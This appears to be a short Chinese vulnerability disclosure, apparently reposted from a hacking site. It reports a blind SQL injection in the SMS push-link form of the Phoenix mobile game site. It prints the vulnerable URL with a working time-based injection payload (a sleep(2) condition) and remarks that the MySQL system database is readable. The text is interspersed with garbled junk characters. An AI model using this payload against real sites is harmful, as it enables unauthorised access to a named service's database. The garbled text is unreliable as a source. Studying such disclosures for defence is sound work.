简要描述:, K: Q0 E5 H+ c+ m) S0 p! `
凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。# t' n, [# y2 O" f
' O, _) l$ {( J+ l- G, z详细说明:8 Y" b( _9 A. M+ l5 v S! i" o' L
存在SQL盲注url:, K: b+ }( _# p: y* d
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=1. G. f& _. B6 F; Z
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
* a8 u/ V$ U7 p7 Zhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png
% M4 Q4 {2 K1 Hhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg. v4 s) I) P* L, u1 @ i. Y
: V m4 I# I2 l: ?# ~9 B能看到mysql系统数据库,看来user权限应该很高的。。 |